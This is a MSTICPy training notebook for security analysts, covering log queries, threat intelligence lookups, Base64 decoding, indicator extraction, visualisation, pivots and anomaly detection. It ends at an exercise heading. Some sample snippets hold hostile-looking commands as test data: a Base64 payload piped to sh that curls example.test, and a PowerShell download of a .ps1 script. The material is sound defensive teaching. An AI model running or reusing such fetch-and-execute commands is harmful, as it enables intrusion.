# MSTICPy Lab

This lab provides an interactive introduction to MSTICPy and its core features. It uses local datasets to provide a repeatable experience, but the same pattern applies when using data from a remote data store via one of MSTICPy's [Data Providers](https://msticpy.readthedocs.io/en/latest/data_acquisition/DataProviders.html).<br>


If you require more information during this lab, more details can be found in the [MSTICPy documentation](https://msticpy.readthedocs.io/en/latest/).

## How to use this lab

The lab contains a number of interactive code examples as well as exercises to be completed. The exercises are entirely optional and can be skipped; however, they provide a useful way to learn about some of the core features of MSTICPy.<br>

To use the notebook, select each cell below and either click the run cell button at the top or use the keyboard shortcut Ctrl+Enter to execute it. Many cells use the output of previous cells, so it's strongly recommended that cells be run in order.<br>

<div class="alert alert-block alert-info">
    <b>Note:</b> Not all cells will have an output, so do not be surprised if nothing appears under a cell after running it. Also, some cells may take a while to run, so please be patient. For more help on running Jupyter notebooks please refer to <a href="https://jupyter.readthedocs.io/en/latest/running.html">this documentation</a>.
</div>

If you get stuck with any of the exercises in this lab you can check your answers in the [completed notebook here](https://github.com/microsoft/msticpy-lab/blob/main/MSTICPy_Lab_Completed.ipynb).<br>

In several places this notebook uses lookups to the external threat intelligence provider [GreyNoise](https://GreyNoise.io/). As this is an online service you may get different responses as that data is updated. Do not be surprised if you get no positive results when running the sections of this notebook where threat intelligence is used.

## Setup

MSTICPy includes a feature called [nbinit](https://msticpy.readthedocs.io/en/latest/msticpy.nbtools.html?highlight=nbinit#module-msticpy.nbtools.nbinit) that handles the process of installing and importing modules into a notebook environment. It was developed to allow for a clearer starting cell in notebooks and to avoid presenting users with a very large cell block at the top of a notebook.<br>

By passing the notebook namespace to `init_notebook()`, this function handles the job of installing and importing core MSTICPy packages along with any others that might be needed by a notebook. When running this cell you may see some warnings - **this is to be expected and will not affect the rest of the lab** - they are simply shown because we are not using a completed configuration in this scenario.

You must have MSTICPy installed to run this notebook (if using Binder, this lab has the package pre-installed for you):
```
!pip install --upgrade msticpy[timeseries,splunk,azsentinel]
```
This lab requires an MSTICPy version later than 1.0.1.

The notebook also uses MSTIC Notebooklets (again pre-installed if using binder):
```
!pip install --upgrade msticnb
```

In [None]:
from msticpy.nbtools import nbinit
nbinit.init_notebook(
    namespace=globals()
)

ti = TILookup()

In [None]:
# We also need to load a couple of answers for one of the exercises (no peeking!)
import json

with open("data/answers.json") as f:
    answers = json.load(f)

## Data Acquisition
The starting point for many security analysis notebooks is ingesting data to analyze or investigate. MSTICPy has a number of [query providers](https://msticpy.readthedocs.io/en/latest/data_acquisition/DataProviders.html) that allow users to query and return data from a number of sources. Below we use the Local Data query provider to return data from local files. This is useful for this lab, but also when analysis relies on local data rather than a 'live' data source.<br>

To provide a common interface layer between data and features in MSTICPy, all data is returned in a Pandas [DataFrame](https://pandas.pydata.org/pandas-docs/stable/reference/api/pandas.DataFrame.html). As well as providing a consistent framework for other features to use, this allows for easy manipulation and analysis of the returned data using Pandas' numerous features.

The first step in using a query provider is to initialize a `QueryProvider` and pass it the type of provider you want to use. Depending on the provider type you can also pass other required parameters. In the cell below we create a LocalData provider and pass it the location where our local data files and their definitions are stored.<br>

Each provider contains a series of built-in queries. These are pre-defined queries that return a specific subset of data. For our LocalData provider this is a specific file; for a 'live' data source such as Azure Sentinel, they execute queries against that data source and return the results.<br>

Once the query provider has been created we can use the `browse_queries` feature to interactively view the available queries.

In [None]:
# We start by loading a query provider for our `LocalData` source.
qry_prov = QueryProvider(data_environment="LocalData", data_paths=["./data"], query_paths=["./data"])
# We can then look at the queries built into a provider by default
qry_prov.browse_queries()

------------------------

Once a query has been selected you call it directly with `qry_prov.{query_group}.{query_name}()`. You can also pass extra parameters to these queries where they have configurable elements (often things such as timeframes and specific entities to search for). In addition, the query providers allow you to execute a query defined as a string by calling `qry_prov.exec_query(QUERY_STRING)`.<br>

The returned dataframe contains the query results and can be displayed and interacted with as with any other Pandas dataframe.

In [None]:
events = qry_prov.WindowsSecurity.list_host_events()
events.head()

<div class="alert alert-block alert-success">
<h3>Lab Exercise 1</h3>
In the cell below write code that uses the query provider created above (`qry_prov`) to get data relating to security alerts using a built-in query. You can use the query browser above to find the most suitable query to run.

<details>
    <summary>Hint:</summary>
    Queries relating to security alerts are part of the SecurityAlert query type.
</details>
</div>

In [None]:
# Get security alert data

## Enrich Data
A key analysis step for security analysts is to take a dataset, extract relevant elements and enrich it with another dataset to help filter it.
A common example of this is taking IP addresses in log data and seeing if any of them appear in threat intelligence data.<br>

In the cells below we use MSTICPy's query provider to get sign-in event data, and then look up the IPs those sign-ins came from against a threat intelligence provider's API using the [MSTICPy threat intelligence](https://msticpy.readthedocs.io/en/latest/data_acquisition/TIProviders.html) features. In this case we are using the [GreyNoise](https://greynoise.io/) provider.

In [None]:
# First we are going to use a built in query to get all of our signin data from our Windows host
data = qry_prov.WindowsSecurity.list_host_logons()
data.head()

MSTICPy includes a [Threat Intelligence (TI) lookup provider](https://msticpy.readthedocs.io/en/latest/data_acquisition/TIProviders.html), `TILookup`, that allows key indicators to be searched for in a range of services. It can be configured to use several different providers, and queries can be targeted at a specific provider if required.
MSTICPy currently supports the following providers:
- VirusTotal
- AlienVault OTX
- IBM XForce
- GreyNoise
- Azure Sentinel Threat Intelligence

There is also support via the TI lookup provider to get the [Open Page Rank](https://www.domcop.com/openpagerank/what-is-openpagerank#:~:text=What%20Is%20Open%20PageRank%3F%20The%20Open%20PageRank%20initiative,has%20been%20collected%20over%20the%20last%207%20years) for a domain, and determine if an IP address is a [Tor](https://www.torproject.org/) exit node.<br>

When instantiating a TI provider you can define the providers you want it to load, or you can let it search for a [MSTICPy config file](https://msticpy.readthedocs.io/en/latest/getting_started/msticpyconfig.html) and take configuration from there - this is the approach we are taking in this lab.

In [None]:
# Next we need to load our TI providers
ti = TILookup()

`.loaded_providers` shows which providers have been loaded by the TI lookup provider.

In [None]:
# For this lab we are just using the GreyNoise provider
ti.loaded_providers

Once loaded you can use `lookup_ioc` to look up a single indicator, or `lookup_iocs` to look up every value in a dataframe column.<br>

In this example we want to look up every IP address in our results dataframe, so we are going to use `lookup_iocs`, tell it to look up values in the "IpAddress" column, and use the GreyNoise service to do the lookups.<br>

Once we have results you can either display the results statically or use `browse_results` to get an interactive view of the results.

In [None]:
# Here we lookup each of the IP addresses in our dataset
results = ti.lookup_iocs(data, obs_col="IpAddress", providers=['GreyNoise'])
ti_browser.browse_results(results, severities=['information', 'warning', 'high'])
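
To picture what a column-wide lookup involves, here is a minimal plain-Python sketch. It is not MSTICPy's implementation: the `SAMPLE_FEED` dictionary, the `lookup_column` helper, and the result field names are all hypothetical stand-ins for a real provider such as GreyNoise. The point is simply that each distinct value in the column is looked up once and gets a result and a severity.

```python
from typing import Dict, Iterable, List

# Hypothetical local "threat feed": indicator -> severity. Not real intelligence data.
SAMPLE_FEED: Dict[str, str] = {
    "203.0.113.7": "high",
    "198.51.100.23": "warning",
}


def lookup_column(rows: Iterable[dict], column: str, feed: Dict[str, str]) -> List[dict]:
    """Look up each distinct value of `column` in `feed`, one result per value."""
    seen = set()
    results = []
    for row in rows:
        value = row.get(column)
        if value is None or value in seen:
            continue  # skip missing values and repeats so each indicator is queried once
        seen.add(value)
        results.append(
            {
                "Ioc": value,
                "Result": value in feed,
                # Indicators with no match get the lowest severity in this sketch
                "Severity": feed.get(value, "information"),
            }
        )
    return results


logons = [
    {"Account": "alice", "IpAddress": "203.0.113.7"},
    {"Account": "bob", "IpAddress": "192.0.2.10"},
    {"Account": "alice", "IpAddress": "203.0.113.7"},
]
ti_results = lookup_column(logons, "IpAddress", SAMPLE_FEED)
hits = [r for r in ti_results if r["Result"]]
```

De-duplicating before the lookup matters with an online service, since repeated IP addresses in log data would otherwise cost one API call each.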

<div class="alert alert-block alert-success">
<h3>Lab Exercise 2</h3>
Now that you have seen how to return and enrich data, complete the code in the following two cells to get a list of Azure AD sign in events and look up the origin IP addresses against threat intelligence.<br>

Additional documentation on the threat intelligence provider can be found [here](https://msticpy.readthedocs.io/en/latest/data_acquisition/TIProviders.html)

<details>
    <summary>Hint:</summary>
    <ul>
        <li>Remember to pass `obs_col="IPAddress"` to `lookup_iocs` to get lookups on the correct column</li>
        <li>You can reuse the TI provider assigned to `ti` in the cells above</li>
    </ul>
</details>
</div>
    


In [None]:
# Use the query provider qry_prov to get Azure signin data with the list_all_signins_geo query


In [None]:
# Lookup the IP addresses in the IPAddress column using the GreyNoise TI provider


## Extracting key data
When working with security-related data, the indicators you need are often not as readily available as they were in the example above. They can be encoded or otherwise obscured from human analysis. MSTICPy includes tooling to help security analysts quickly decode this data for further analysis.<br>

In this section we are going to query our datasets for command line data, decode any Base64 encoding in the command lines using the [`base64` feature](https://msticpy.readthedocs.io/en/latest/data_analysis/Base64Unpack.html), and then extract known indicator types (such as IP addresses and domain names) from that data using the [`IoCExtract` feature](https://msticpy.readthedocs.io/en/latest/data_analysis/IoCExtract.html).

In [None]:
# Load command line data set
cmdl_data = qry_prov.WindowsSecurity.list_host_processes()
cmdl_data.head()

Now that we have some data, we can call `base64.unpack_df` and tell it to unpack data found in the 'CommandLine' column. This feature will look for Base64 patterns in that column, attempt to unpack any it finds and present us with the decoded output.<br>

`base64.unpack_df` outputs only the elements relevant to the decoded string. To get some context on where this string was found, we next join it back to the original dataset so that we can see the log event and the decoded string together.

In [None]:
# Base64 decode
b64df = base64.unpack_df(data=cmdl_data.head(1000), column='CommandLine')
b64df['SourceIndex'] = pd.to_numeric(b64df['src_index'])
merged_df = (cmdl_data
             .merge(right=b64df, how='left', left_index=True, right_on='SourceIndex')
             #.drop(columns=['Unnamed: 0'])
             .set_index('SourceIndex'))

# Show the result of the merge (only those rows that have a value in decoded_string)
merged_filtered = merged_df.dropna(subset=['decoded_string'])[["TimeGenerated", "Account", "Computer", "NewProcessName", "CommandLine_x", "decoded_string"]]
merged_filtered
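
The idea behind the decoding step can be sketched with the standard library alone. This is an illustration under stated assumptions, not how `base64.unpack_df` works internally: the regular expression, the 20-character minimum, and the `decode_candidates` helper are choices made for this example, and it only handles UTF-8 text (encoded PowerShell commands, for instance, are commonly UTF-16).

```python
import base64
import binascii
import re
from typing import List, Tuple

# Runs of 20+ Base64 characters with optional padding. The length floor is an
# arbitrary choice for this sketch to avoid matching ordinary words.
B64_PATTERN = re.compile(r"[A-Za-z0-9+/]{20,}={0,2}")


def decode_candidates(command_line: str) -> List[Tuple[str, str]]:
    """Return (original, decoded) pairs for Base64-looking substrings that decode to text."""
    decoded = []
    for match in B64_PATTERN.findall(command_line):
        try:
            raw = base64.b64decode(match, validate=True)
            text = raw.decode("utf-8")
        except (binascii.Error, UnicodeDecodeError):
            continue  # not valid Base64, or not readable text: ignore this candidate
        decoded.append((match, text))
    return decoded


# Build a sample command line containing an encoded payload
encoded = base64.b64encode(b"curl http://example.test/payload").decode("ascii")
cmd = f"bash -c 'echo {encoded} | base64 -d | sh'"
found = decode_candidates(cmd)
```

Keeping the original substring next to the decoded text plays the same role as the merge in the cell above: it lets you trace a decoded string back to the event it came from.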

Now that we have the decoded string, we can look for any Indicators of Compromise (IoCs) in these strings. Using [MSTICPy's `IoCExtract`](https://msticpy.readthedocs.io/en/latest/data_analysis/IoCExtract.html) we can search all of these decoded strings for things such as IP addresses, file hashes and URLs. You can choose to search specific indicator types by passing the `ioc_types` parameter but we want to just search for everything.<br>

MSTICPy has a set of common IoC patterns to search for and extract but you can also extend this by adding your own regex patterns with `add_ioc_type`.

In [None]:
# Extract IoCs
ioc_extractor = IoCExtract()
ioc_df = ioc_extractor.extract(data=merged_filtered, columns=['decoded_string'])
ioc_df
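
Pattern-based extraction of this kind can be illustrated with a few regular expressions. The sketch below is deliberately simplified and is not the set of patterns `IoCExtract` ships with: the `IOC_PATTERNS` dictionary and the `extract_iocs` helper are hypothetical, and the IPv4 pattern does not validate octet ranges.

```python
import re
from typing import Dict, List

# Simplified illustrative patterns; production-grade extraction needs stricter rules
# (for example, validating octet ranges and top-level domains).
IOC_PATTERNS: Dict[str, re.Pattern] = {
    "ipv4": re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b"),
    "url": re.compile(r"\bhttps?://[^\s'\"<>]+"),
    "md5_hash": re.compile(r"\b[a-fA-F0-9]{32}\b"),
}


def extract_iocs(text: str) -> List[dict]:
    """Return one record per distinct observable found for each pattern."""
    found = []
    for ioc_type, pattern in IOC_PATTERNS.items():
        for observable in sorted(set(pattern.findall(text))):
            found.append({"IoCType": ioc_type, "Observable": observable})
    return found


sample = "powershell -c iwr http://203.0.113.7/a.ps1 ; connect 198.51.100.23"
iocs = extract_iocs(sample)
```

In this sketch, supporting a new indicator type is a matter of adding another named pattern to the dictionary, which is the same idea as registering a custom regex with `add_ioc_type`.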

We can also use `domain_utils` to get some other information on the domain, such as what IP addresses it resolves to.

In [None]:
from msticpy.sectools.domain_utils import dns_resolve
dns_info = dns_resolve(ioc_df.iloc[0]['Observable'])
display(dns_info)

<div class="alert alert-block alert-success">
    <h3>Lab Exercise 4</h3>
Syslog data is a common data source during security analysis. The syslog data structure includes a lot of key information in a single field that can make extraction complicated. <br>
In this exercise you will load syslog data and extract indicators from the Message field.<br>

**Bonus Task**:<br>
Identify the Base64 encoded syslog messages and extract indicators from those as well.

<details>
    <summary>Hint:</summary>
    <ul>
        <li>Syslog data is found under the LinuxSyslog type of queries</li>
        <li>Core syslog data is stored in the SyslogMessage column</li>
    </ul>
</details>
</div>

In [None]:
# Load syslog data


In [None]:
# Extract URL indicators from the SyslogMessage column and get a unique list of indicators found


In [None]:
# Decode Base64 data and extract indicators

# get a list of decoded strings

# Extract dns indicators from these strings (use the full_decoded_string column)


## Data Visualization
Data visualization is a key tool in any data analysis scenario, and the same is true during security analysis. MSTICPy contains a number of visualizations. Below we plot locations on a map to help identify anomalous logon locations, show a graph of security alerts, and plot a process tree showing process executions on a host.<br>

*MSTICpy uses [Bokeh](https://bokeh.org/) and [Folium](https://python-visualization.github.io/folium/#) to power its visualization features.*

The first thing we need to do is get some data to plot. Here we will use Azure AD sign-in events. These events include the location the login occurred from, allowing us to easily plot them on a map for geospatial analysis.

In [None]:
# Load Azure AD sign-in data (including IP geolocation) to plot on a map
loc_data = qry_prov.Azure.list_all_signins_geo()
loc_data.head()

Before we can plot the data we need to format the raw data into a known format. MSTICPy has a number of [defined entities](https://msticpy.readthedocs.io/en/latest/msticpy.datamodel.html?highlight=entitie), one of which is `Ip`. The entity has a location property, so by mapping the columns in our data to the properties of these entities we can easily format the whole dataset into a series of entities.

From there we can then use MSTICPy's [`FoliumMap`](https://msticpy.readthedocs.io/en/latest/visualization/FoliumMap.html) feature to plot these entities on a map.

In [None]:
ip_ents = []
def format_ips(row):
    ip_ent = entities.ip_address.Ip(Address=row['IPAddress'])
    loc = entities.GeoLocation(Longitude=float(row['Longitude']), Latitude=float(row['Latitude']))
    ip_ent.Location = loc
    ip_ents.append(ip_ent)
    
# Format dataset into entities
loc_data.apply(format_ips, axis=1)
# Create Map plot
folium_map = FoliumMap(zoom_start=2)
# Add IP entities to the map
folium_map.add_ip_cluster(ip_entities=ip_ents, color="blue")
# Center the map around the plotted entities
folium_map.center_map()
# Display the map
folium_map
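
The row-to-entity mapping used above can be sketched with plain dataclasses. The `GeoPoint` and `IpRecord` classes below are hypothetical stand-ins for MSTICPy's entities, and averaging coordinates is just one simple way to pick a map centre; it is an assumption for this example, not a description of what `center_map` does.

```python
from dataclasses import dataclass
from typing import List, Optional, Tuple


@dataclass
class GeoPoint:
    latitude: float
    longitude: float


@dataclass
class IpRecord:
    address: str
    location: Optional[GeoPoint] = None


def rows_to_entities(rows: List[dict]) -> List[IpRecord]:
    """Map raw column values onto typed entity objects."""
    records_out = []
    for row in rows:
        point = GeoPoint(latitude=float(row["Latitude"]), longitude=float(row["Longitude"]))
        records_out.append(IpRecord(address=row["IPAddress"], location=point))
    return records_out


def centre_of(records: List[IpRecord]) -> Tuple[float, float]:
    """Naive centre: the mean latitude and longitude of all located records."""
    located = [r.location for r in records if r.location is not None]
    lat = sum(p.latitude for p in located) / len(located)
    lon = sum(p.longitude for p in located) / len(located)
    return lat, lon


signins = [
    {"IPAddress": "203.0.113.7", "Latitude": "10.0", "Longitude": "20.0"},
    {"IPAddress": "198.51.100.23", "Latitude": "30.0", "Longitude": "40.0"},
]
records = rows_to_entities(signins)
centre = centre_of(records)
```

A plain mean of longitudes misbehaves for points on either side of the 180° meridian, so treat this purely as an illustration of the mapping step.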

Another useful visualization is a graph plot that shows connections between events. This is particularly useful when looking at data items such as alerts that contain a lot of embedded data such as affected hosts and users. By graph plotting alert data we can see the connections between them that might help a security analyst get a better understanding of an intrusion.

Using [`create_alert_graph`](https://msticpy.readthedocs.io/en/latest/msticpy.data.html?highlight=create_alert_graph#msticpy.nbtools.security_alert_graph.create_alert_graph) we can create a [NetworkX](https://networkx.org/) representation of a security alert, and link it to our other alerts. We then call [`draw_alert_entity_graph`](https://msticpy.readthedocs.io/en/latest/msticpy.nbtools.html?highlight=draw_alert_entity_graph#msticpy.nbtools.nbdisplay.draw_alert_entity_graph) to display this.



In [None]:
# Security Alert Graph
alert_df = qry_prov.SecurityAlert.list_alerts()
# Create a Security Alert entity
alert = SecurityAlert(alert_df.iloc[0])
# Create a graph
grph = create_alert_graph(alert)
# Add other alerts to the graph
full_grph = add_related_alerts(alert_df, grph)
# Display the graph
nbdisplay.draw_alert_entity_graph(full_grph, width=15)

Another common visualization in security tooling is the process tree. This shows the hierarchical relationship of processes executed on a host.

MSTICPy has functions to both build and plot these process trees based off Windows process creation events. More details on these functions can be found [here](https://msticpy.readthedocs.io/en/latest/visualization/ProcessTree.html).

In [None]:
# Before plotting a process tree we need to get data related to process creation events
proc_df = qry_prov.WindowsSecurity.get_process_tree()
proc_df.head()

In [None]:
# We start by building the process tree
p_tree_win = ptree.build_process_tree(proc_df, schema=None, show_progress=False, debug=False)
# We then identify the root processes and get the descendants of the first one
proc_tree = ptree.get_descendents(p_tree_win, ptree.get_roots(p_tree_win).iloc[0])
# we can then plot the process tree
nbdisplay.plot_process_tree(data=proc_tree, legend_col="SubjectUserName", show_table=True)
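
To show what building a process tree means, here is a small sketch that links hypothetical process records by parent ID and prints them as an indented hierarchy. The `pid`/`ppid`/`name` fields and the helper functions are assumptions for this example; real process creation events carry many more fields, and because process IDs are reused over time a real implementation also has to take timestamps into account.

```python
from collections import defaultdict
from typing import Dict, List

# Hypothetical, simplified process-creation records
events = [
    {"pid": 100, "ppid": 1, "name": "explorer.exe"},
    {"pid": 200, "ppid": 100, "name": "cmd.exe"},
    {"pid": 300, "ppid": 200, "name": "powershell.exe"},
    {"pid": 400, "ppid": 100, "name": "notepad.exe"},
]


def build_children(records: List[dict]) -> Dict[int, List[dict]]:
    """Index records by parent process ID."""
    children = defaultdict(list)
    for rec in records:
        children[rec["ppid"]].append(rec)
    return children


def find_roots(records: List[dict]) -> List[dict]:
    """Roots are processes whose parent does not appear in the data set."""
    known = {rec["pid"] for rec in records}
    return [rec for rec in records if rec["ppid"] not in known]


def render(records: List[dict]) -> List[str]:
    """Return the tree as indented lines, one per process, depth first."""
    children = build_children(records)
    lines = []

    def walk(rec: dict, depth: int) -> None:
        lines.append("  " * depth + rec["name"])
        for child in children.get(rec["pid"], []):
            walk(child, depth + 1)

    for root in find_roots(records):
        walk(root, 0)
    return lines


tree_lines = render(events)
```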

Temporal analysis is another key tool in security investigation. Seeing in which order events occur, and how events cluster temporally, can provide invaluable insights. To help with this MSTICPy contains a flexible [timeline feature](https://msticpy.readthedocs.io/en/latest/visualization/EventTimeline.html) that allows for the plotting of a range of data on a timeline. You can plot simple single category discrete events, running values, and multi series events all in an interactive [Bokeh](https://bokeh.org/) visualization.

Using the timeline is as simple as passing a dataframe of data to `display_timeline`. By default this will use the TimeGenerated column for the time element, and a set of common column values to display when hovering over an event. These can be customized with the `time_column` and `source_columns` parameters (as used below).


In [None]:
# Get some data to plot
alert_df = qry_prov.SecurityAlert.list_alerts()
# Plot these values on a timeline based on when they were generated
nbdisplay.display_timeline(alert_df, source_columns=["AlertName"])

It's also possible to group events by a column to show them as separate rows in the timeline. This is done by passing the column you want to split on as `group_by` - below we are grouping by the alert severity.

There are also many other ways to customize this timeline. Please read the [full documentation](https://msticpy.readthedocs.io/en/latest/msticpy.nbtools.html#msticpy.nbtools.timeline.display_timeline) to see a list of options.

In [None]:
nbdisplay.display_timeline(alert_df, source_columns=["AlertName"], group_by="Severity")
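
Conceptually, grouping splits the events into one time-ordered series per distinct value of the chosen column. The sketch below shows that step in plain Python with made-up alert records; `group_for_timeline` is a hypothetical helper, not part of MSTICPy, and it leaves the actual plotting out.

```python
from collections import defaultdict
from datetime import datetime
from typing import Dict, List

# Made-up alert records for illustration
alerts = [
    {"TimeGenerated": datetime(2021, 1, 1, 12, 0), "AlertName": "Suspicious logon", "Severity": "High"},
    {"TimeGenerated": datetime(2021, 1, 1, 9, 0), "AlertName": "Port scan", "Severity": "Low"},
    {"TimeGenerated": datetime(2021, 1, 1, 10, 30), "AlertName": "Malware detected", "Severity": "High"},
]


def group_for_timeline(
    events: List[dict], group_by: str, time_column: str = "TimeGenerated"
) -> Dict[str, List[dict]]:
    """Return one time-ordered list of events per distinct `group_by` value."""
    rows = defaultdict(list)
    for event in sorted(events, key=lambda e: e[time_column]):
        rows[event[group_by]].append(event)
    return dict(rows)


timeline_rows = group_for_timeline(alerts, group_by="Severity")
high_names = [e["AlertName"] for e in timeline_rows["High"]]
```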

<div class="alert alert-block alert-success">
    <h3>Lab Exercise 5</h3>
    In this lab you are going to plot your own timeline of events.<br>
    The timeline should plot Windows Host Logon events (.WindowsSecurity.list_host_logons).<br>
    You should group these by the logon type, and the hover over should show the user account logging in and what IP address they logged in from.
    
<details>
    <summary>Hint:</summary>
    <ul>
        <li>Grouping is passed with the 'group_by' parameter.</li>
        <li>Hover over values are set with the 'source_columns' parameter.</li>
    </ul>
</details>
</div>

In [None]:
# Load data


# Plot the timeline



## Pivots in MSTICPy

MSTICPy has a lot of functionality distributed across many classes and modules. However, there is no simple way to discover where these functions are and what types of data the function is relevant to.

[Pivot functions](https://msticpy.readthedocs.io/en/latest/data_analysis/PivotFunctions.html) bring this functionality together grouped around Entities. Entities are representations of real-world objects found commonly in CyberSec investigations. Some examples are: IpAddress, Host, Account, URL.

In the following cells we look at how pivot functions can be used to easily access MSTICPy functionality relevant to the indicator being investigated.

<div class="alert alert-block alert-warning">
<b>Note:</b> When you initialize the Pivot provider you will get a configuration error warning. This is not a problem (we are not using these features in this lab); we have included it to give you an example of the customized warnings in MSTICPy. These are designed to help users when running MSTICPy in notebooks: the error provides instructions and guidance to resolve the issue (you don't have to resolve this one though!).
</div>

We start by initializing our Pivots:

In [None]:
from msticpy.datamodel.pivot import Pivot
Pivot(namespace=globals())

Once loaded we can take a look at the available Pivots.

<div class="alert alert-block alert-info">
<b>Note:</b> The available Pivots are based on the providers we have loaded so if you have additional providers loaded you will have more Pivots available to you.</div>



In [None]:
# Once loaded we can browse what pivots are available in an interactive widget
Pivot.browse()

To begin to Pivot we first need an entity to Pivot on. For this lab we are going to use an IP address entity, and once extracted our first Pivot will be to see what sort of IP address it is, using the `ip_type` Pivot.

In this example we are running the Pivot on a single indicator, however many Pivots also let you apply them to an entire dataframe (you will see this in the next Pivot example).

In [None]:
# Get an IP Address to pivot on
ip_df =  qry_prov.Network.list_azure_network_flows_by_ip()
ip = ip_df.iloc[0]['VMIPAddress']
# See what type of IP address we are working with.
entities.IpAddress.util.ip_type(ip_str=ip)
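
Classifying an address in this way can be reproduced with Python's standard `ipaddress` module. The sketch below is an approximation for illustration: the `classify_ip` helper and its label strings are choices made for this example and may not match the exact values the `ip_type` Pivot returns.

```python
import ipaddress


def classify_ip(ip_str: str) -> str:
    """Return a coarse category for an IPv4 or IPv6 address string."""
    ip = ipaddress.ip_address(ip_str)
    # Check the most specific categories first, since some ranges overlap
    if ip.is_loopback:
        return "Loopback"
    if ip.is_link_local:
        return "Link Local"
    if ip.is_multicast:
        return "Multicast"
    if ip.is_private:
        return "Private"
    if ip.is_global:
        return "Public"
    return "Reserved"


ip_types = {addr: classify_ip(addr) for addr in ["10.0.0.5", "8.8.8.8", "127.0.0.1"]}
```

Knowing the type up front is useful because lookups against external threat intelligence only make sense for public addresses.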

As well as individual Pivots you can chain them together to perform several actions on a dataset.<br>
More information on [Pivots can be found in the MSTICPy documentation](https://msticpy.readthedocs.io/en/latest/data_analysis/PivotFunctions.html)

In the cell below we take a dataframe containing command line data and apply a chain of Pivots to it.<br>
The chain in use does the following:<br>
<ul>
    <li>Extracts IoCs from the command lines in the data</li>
    <li>Filters to only logs that contained IoCs</li>
    <li>Further filters to where the IoCs were IP addresses</li>
    <li>Looks up those IP address in threat intelligence</li>
    <li>Filters to only those events where there was a match in threat intelligence</li>
</ul>

In [None]:
# Get some command line data
cmdl_data = qry_prov.LinuxSyslog.list_all_syslog_events()
# Extract IoCs from command lines
(cmdl_data.head(500)
     .mp_pivot.run(entities.Process.util.extract_iocs, column="SyslogMessage", join="left")
     # Filter where there were IoCs found
     .dropna(subset=["Observable"])
     # Filter to only IP IoCs
     .query("IoCType == 'ipv4'")
     # Lookup IoCs in threat intel
     .mp_pivot.run(entities.IpAddress.ti.lookup_ipv4_GreyNoise, column="Observable", join="left")
     # Filter to where the IPs were found in threat intel
     .query('Status != 404')
 )
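
The shape of that chain (extract, filter, enrich, filter) can be sketched with ordinary generators. Everything here is hypothetical and standard-library only: `SAMPLE_FEED` stands in for a TI provider, status `404` is used as a "no match" marker to mirror the filter in the cell above, and the IPv4 pattern is simplified.

```python
import re
from typing import Dict, Iterable, Iterator

IPV4 = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")  # simplified, no octet validation
SAMPLE_FEED: Dict[str, int] = {"203.0.113.7": 200}  # hypothetical feed: indicator -> status


def extract_ips(rows: Iterable[dict], column: str) -> Iterator[dict]:
    """Left-join style: one output row per IP found; rows without IPs get Observable=None."""
    for row in rows:
        matches = IPV4.findall(row[column])
        if not matches:
            yield {**row, "Observable": None}
        for ip in matches:
            yield {**row, "Observable": ip}


def add_ti_status(rows: Iterable[dict], feed: Dict[str, int]) -> Iterator[dict]:
    """Attach a lookup status to each row; 404 marks 'not found' in this sketch."""
    for row in rows:
        yield {**row, "Status": feed.get(row["Observable"], 404)}


syslog = [
    {"SyslogMessage": "Accepted password for root from 203.0.113.7 port 22"},
    {"SyslogMessage": "session opened for user admin"},
    {"SyslogMessage": "Failed password from 192.0.2.10 port 22"},
]

with_iocs = extract_ips(syslog, "SyslogMessage")
only_iocs = (r for r in with_iocs if r["Observable"] is not None)
enriched = add_ti_status(only_iocs, SAMPLE_FEED)
ti_matches = [r for r in enriched if r["Status"] != 404]
```

Filtering out rows with no indicators before the lookup step keeps the number of threat intelligence queries down, which is why the filter sits in the middle of the chain.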

<div class="alert alert-block alert-success">

<h3>Lab Exercise 6</h3>
Create your own pivot pipeline that does the following:<br>
<ul>
    <li>Takes the dataframe created for you (net_df)</li>
    <li>Gets the type of IP address and joins this to the data</li>
    <li>Selects only the Public IP addresses in the dataset</li>
    <li>Filters to only 100 events</li>
    <li>Looks up the IP addresses in threat intelligence feeds using GreyNoise</li>
    <li>Selects only the IP addresses where there is a match in threat intelligence</li>
</ul>

<details>
    <summary>Hint:</summary>
    <ul>
        <li>.head(100) will filter a Pandas dataframe to 100 rows</li>
        <li>when calling pivot.run the parameter join='left' can be used to join the resulting dataframe into the original dataframe</li>
        <li>Positive threat intel results from GreyNoise can be distinguished by the status not being 404</li>
    </ul>
</details>
</div>

In [None]:
net_df = qry_prov.Network.list_azure_network_flows_by_ip()
net_df['PublicIPs'] = net_df['PublicIPs'].str.strip("['']").str.replace("'", "").str.replace(" ", "").str.split(",")
net_df = net_df.assign(IPs=net_df['PublicIPs'].explode('IPs'))
net_df.dropna(subset=['IPs'], inplace=True)
# Create the pivot chain


## MSTICPy's ML Features

MSTICPy has a number of basic ML features to support simple analysis that is common in security investigation. In the following section we will look at two of those: time series analysis and clustering.

In order to effectively hunt in a dataset analysts need to focus on specific events of interest. Below we use MSTICpy's [time series analysis](https://msticpy.readthedocs.io/en/latest/msticpy.analysis.html?highlight=timeseries#module-msticpy.analysis.timeseries) machine learning capabilities to identify anomalies in our network traffic for further investigation.<br>
As well as computing anomalies we visualize the data so that we can more easily see where these anomalies present themselves.


In [None]:
# Import MSTICPy's timeseries specific features
from msticpy.analysis.timeseries import timeseries_anomalies_stl
from msticpy.nbtools.timeseries import display_timeseries_anomolies

# Load some network data to apply our analysis to
stldemo = qry_prov.Network.get_network_summary()

# Conduct our timeseries analysis
output = timeseries_anomalies_stl(stldemo)

# Visualize the timeseries and any anomalies
display_timeseries_anomolies(data=output, y= 'TotalBytesSent')
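
For intuition about what flagging an anomaly in a series means, the sketch below uses a much simpler technique than the STL decomposition applied above: a robust z-score based on the median and the median absolute deviation (MAD). This is a swapped-in method for illustration only, with made-up numbers and a hypothetical `flag_anomalies` helper, and unlike STL it takes no account of trend or seasonality.

```python
from statistics import median
from typing import List


def flag_anomalies(values: List[float], threshold: float = 3.5) -> List[bool]:
    """Flag values whose robust z-score (median/MAD based) exceeds `threshold`."""
    med = median(values)
    mad = median(abs(v - med) for v in values)
    if mad == 0:
        return [False] * len(values)  # no spread at all, so nothing can stand out
    # 0.6745 scales the MAD so the score is comparable to a standard z-score
    return [abs(0.6745 * (v - med) / mad) > threshold for v in values]


# Made-up hourly byte counts with one obvious spike
bytes_sent = [100, 110, 95, 105, 98, 102, 5000, 101, 99, 104]
flags = flag_anomalies(bytes_sent)
anomalous_hours = [i for i, is_anomaly in enumerate(flags) if is_anomaly]
```

Using the median rather than the mean means a single large spike does not drag the baseline up and hide itself.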

<div class="alert alert-block alert-success">

<h3>Lab Exercise 7</h3>
